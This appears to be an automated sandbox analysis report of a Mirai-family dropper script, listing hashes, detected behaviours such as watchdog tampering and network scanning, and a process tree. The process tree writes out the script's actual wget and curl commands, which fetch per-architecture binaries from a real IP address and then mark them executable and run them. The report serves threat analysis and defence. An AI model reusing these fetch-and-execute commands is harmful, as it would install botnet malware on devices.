Analysis
-
max time kernel
30s -
max time network
40s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
15-12-2024 10:38
Static task
static1
Behavioral task
behavioral1
Sample
Oblivion121.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
Oblivion121.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
Oblivion121.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
Oblivion121.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
Oblivion121.sh
-
Size
1KB
-
MD5
90e5e43e5d798a41934d7f30e8208b24
-
SHA1
0748835c71a1c54c8ea6bc7d0baf831f12eb0ef7
-
SHA256
09e9f78247105e4500f5722131940080633c40ba32803d3f4b5b370ae5ae6233
-
SHA512
ea39caa2f2242cd2c46b6f8841fb6e4bb8defdb2fb2dfb831f0dde5cee12707dc1aebc920c1e0834bcc7fab1aeb5caf69cf3ba56f1e6d9a5b9c4bd7b87020032
Malware Config
Extracted
mirai
MIRAI
Extracted
mirai
MIRAI
Signatures
-
Mirai family
-
Contacts a large (4330) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 748 chmod 781 chmod 809 chmod 836 chmod 716 chmod 769 chmod 776 chmod 786 chmod 791 chmod 825 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/cp 718 cp /tmp/cp 750 cp /tmp/cp 770 cp /tmp/cp 777 cp /tmp/cp 782 cp /tmp/cp 787 cp /tmp/cp 792 cp /tmp/cp 810 cp /tmp/cp 826 cp /tmp/cp 837 cp -
Modifies Watchdog functionality 1 TTPs 8 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp File opened for modification /dev/watchdog cp File opened for modification /dev/misc/watchdog cp -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates active TCP sockets 1 TTPs 4 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 4 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp File opened for reading /proc/net/tcp cp -
description ioc Process File opened for reading /proc/1/fd cp File opened for reading /proc/297/fd cp File opened for reading /proc/self/auxv curl File opened for reading /proc/297/fd cp File opened for reading /proc/838/fd cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/264/fd cp File opened for reading /proc/811/fd cp File opened for reading /proc/799/fd cp File opened for reading /proc/641/fd cp File opened for reading /proc/823/fd cp File opened for reading /proc/284/fd cp File opened for reading /proc/322/fd cp File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/795/fd cp File opened for reading /proc/284/fd cp File opened for reading /proc/601/fd cp File opened for reading /proc/602/fd cp File opened for reading /proc/651/fd cp File opened for reading /proc/602/fd cp File opened for reading /proc/843/fd cp File opened for reading /proc/213/fd cp File opened for reading /proc/301/fd cp File opened for reading /proc/801/fd cp File opened for reading /proc/601/fd cp File opened for reading /proc/817/fd cp File opened for reading /proc/297/fd cp File opened for reading /proc/651/fd cp File opened for reading /proc/811/fd cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/594/fd cp File opened for reading /proc/799/fd cp File opened for reading /proc/167/fd cp File opened for reading /proc/829/fd cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/167/fd cp File opened for reading /proc/269/fd cp File opened for reading /proc/829/fd cp File opened for reading /proc/213/fd cp File opened for reading /proc/268/fd cp File opened for reading /proc/797/fd cp File opened for reading /proc/806/fd cp File opened for reading /proc/284/fd cp File opened for reading /proc/self/auxv curl File opened for reading /proc/268/fd cp File opened for reading /proc/802/fd cp File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/265/fd cp File opened for reading /proc/322/fd cp File opened for reading /proc/601/fd cp File opened for reading /proc/self/auxv curl File opened for reading /proc/297/fd cp File opened for reading /proc/1/fd cp File opened for reading /proc/264/fd cp File opened for reading /proc/795/fd cp File opened for reading /proc/813/fd cp File opened for reading /proc/833/fd cp File opened for reading /proc/322/fd cp File opened for reading /proc/827/fd cp File opened for reading /proc/269/fd cp -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 721 wget 731 curl 746 cat 750 cp -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/IGz.x86 wget File opened for modification /tmp/cp Oblivion121.sh File opened for modification /tmp/IGz.arm5 curl File opened for modification /tmp/IGz.sh4 curl File opened for modification /tmp/IGz.ppc wget File opened for modification /tmp/IGz.sh4 wget File opened for modification /tmp/IGz.mips curl File opened for modification /tmp/IGz.arm5 wget File opened for modification /tmp/IGz.arm6 wget File opened for modification /tmp/IGz.arm7 wget File opened for modification /tmp/IGz.arm6 curl File opened for modification /tmp/IGz.m68k curl File opened for modification /tmp/IGz.arm4 curl File opened for modification /tmp/IGz.arm7 curl File opened for modification /tmp/IGz.ppc curl File opened for modification /tmp/IGz.m68k wget File opened for modification /tmp/IGz.x86 curl File opened for modification /tmp/IGz.mips wget File opened for modification /tmp/IGz.mpsl wget File opened for modification /tmp/IGz.mpsl curl
Processes
-
/tmp/Oblivion121.sh/tmp/Oblivion121.sh1⤵
- Writes file to tmp directory
PID:649 -
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.x862⤵
- Writes file to tmp directory
PID:652
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.x862⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:672
-
-
/bin/catcat IGz.x862⤵PID:714
-
-
/bin/chmodchmod +x cp IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU2⤵
- File and Directory Permissions Modification
PID:716
-
-
/tmp/cp./cp x862⤵
- Executes dropped EXE
PID:718
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:721
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:731
-
-
/bin/catcat IGz.mips2⤵
- System Network Configuration Discovery
PID:746
-
-
/bin/chmodchmod +x cp IGz.mips IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/cp./cp mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:750
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.mpsl2⤵
- Writes file to tmp directory
PID:752
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/catcat IGz.mpsl2⤵PID:768
-
-
/bin/chmodchmod +x cp IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU2⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/cp./cp mpsl2⤵
- Executes dropped EXE
PID:770
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.arm42⤵PID:773
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:774
-
-
/bin/catcat IGz.arm42⤵PID:775
-
-
/bin/chmodchmod +x cp IGz.arm4 IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/cp./cp arm42⤵
- Executes dropped EXE
PID:777
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.arm52⤵
- Writes file to tmp directory
PID:778
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/catcat IGz.arm52⤵PID:780
-
-
/bin/chmodchmod +x cp IGz.arm4 IGz.arm5 IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/cp./cp arm52⤵
- Executes dropped EXE
PID:782
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.arm62⤵
- Writes file to tmp directory
PID:783
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/catcat IGz.arm62⤵PID:785
-
-
/bin/chmodchmod +x cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/cp./cp arm62⤵
- Executes dropped EXE
PID:787
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.arm72⤵
- Writes file to tmp directory
PID:788
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/catcat IGz.arm72⤵PID:790
-
-
/bin/chmodchmod +x cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.mips IGz.mpsl IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/cp./cp arm72⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:792
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.ppc2⤵
- Writes file to tmp directory
PID:796
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/chmodchmod +x cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.mips IGz.mpsl IGz.ppc IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/cp./cp ppc2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:810
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.m68k2⤵
- Writes file to tmp directory
PID:814
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/chmodchmod +x cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.m68k IGz.mips IGz.mpsl IGz.ppc IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/cp./cp m68k2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:826
-
-
/usr/bin/wgetwget http://188.132.232.157/IGz/IGz.sh42⤵
- Writes file to tmp directory
PID:830
-
-
/usr/bin/curlcurl -O http://188.132.232.157/IGz/IGz.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/chmodchmod +x cp IGz.arm4 IGz.arm5 IGz.arm6 IGz.arm7 IGz.m68k IGz.mips IGz.mpsl IGz.ppc IGz.sh4 IGz.x86 Oblivion121.sh systemd-private-5e0f008925fb4857a189a0a6e13ef341-systemd-timedated.service-HevMqU2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/cp./cp sh42⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:837
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
72KB
MD5acd283bf65ed831dd470134f403a9294
SHA13c0f8231e8089430e32ef8daea73597170a2b4c0
SHA2568d4e7068fc99a8f0fc7e2b095c206fda09ade9ea61091c40405e90dd6894ed67
SHA5120847ba7306de9087cd0a4f79f20de2da0baffa1e2d8c09d509b3bd573122593c935b6e39076393d08b9e2da12d89b55f70cbb3c99d42175c4daca848f00a8c72
-
Filesize
153KB
MD5558fc8df865663836770a42334dd88c0
SHA10276f7274984928e64fbe354bb0df966d1eacb86
SHA256b23789685e87bf3931a7cc2c8d33dcf4417332e5d5a5cd7778f97e063f8d9118
SHA512561756714ec8c40ed714e350df57f3c494e0995cfb6e0ca9146d4b47651f66b20d2c11d0fd77f3f05b92ca4ec05f3ddfb532ac92287a316354d2ea432e3fea4e
-
Filesize
149KB
MD5bb18c503add46a96288b7a15562dbbc7
SHA17d12569aea77474a3fa81c841d50fa0a2351f438
SHA256b556b41e8071e7164f880963b24c4f2ae5fe28d2b71716e410a0f17a91eb607c
SHA5129479a4c1784f08cfa7ee71b8d59841e81a581b3f9c0362ff8e11c6a4ccef2bf21460dafec49a770778cbb8e472fd7c000e00513e29363814bc6aa20ee34830ce
-
Filesize
277B
MD57d8ef5970f2b96d4b52dadc7799ec3f3
SHA1e57969e79884c7c6c19254a56c1a2dc1beac99ea
SHA2564d7e5dd9904c0d7d6760062fd67c68be810797911559604d3c3a9b1cf23a8ceb
SHA512709bf7cf2e255b7a9cfe4a0f76a31af55cb53d8e843e05f1bda918a9f26de514813c08ffcb64829535ae268cf5acd73a1bf6c8d650d3070b93624cf8962e578d
-
Filesize
69KB
MD55497f5783f3eb4af7d3636a10ca61be4
SHA1b0368826ff88407deff3fd60c5fefa1f0c376b75
SHA25689b62e301cea7d89839dc2b046d0cef8fca89f90e750266935fb1e3bd6ba4087
SHA512bca1f683daac0b9f3bddc08bc701d91c47e3a81d626628da2db2617dbeadc2394d8dadec92b4b321822a002bc5943600abc61d2c74d7eedc78ad747f48b29fc0
-
Filesize
151KB
MD5736c31e68e569b75d420f45aa0a564a5
SHA186c6eaa1615dad670f8d87fec928f5b1aafb2c5e
SHA2560cf773711a14965c3e7f9f7d6ce6ddf680ca633b3ae815d7759fd112d9fec91c
SHA51210474f88e041956cf286e5567ec01362e6fb480050372db1057ff6f83b8a03d57a50f3bc447d3c8e210dadb86dd85649d21603580fb07ef4af709f9a98557256